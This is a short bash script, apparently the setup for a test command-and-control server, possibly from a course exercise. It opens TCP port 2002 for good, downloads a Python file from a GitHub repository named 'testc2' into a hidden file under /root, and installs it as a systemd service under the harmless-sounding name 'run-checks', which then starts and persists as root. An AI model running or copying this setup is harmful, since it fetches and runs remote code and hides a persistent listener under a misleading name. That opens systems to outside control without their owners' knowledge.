#!/bin/bash
firewall-cmd --add-port=2002/tcp --permanent
firewall-cmd --reload

curl -s -o /root/.wk4server.py https://raw.githubusercontent.com/rsingla2012/testc2/main/wk4server.py

curl -s -o /etc/systemd/system/run-checks.service https://raw.githubusercontent.com/rsingla2012/testc2/main/run-checks.service

systemctl daemon-reload
systemctl enable run-checks
systemctl start run-checks
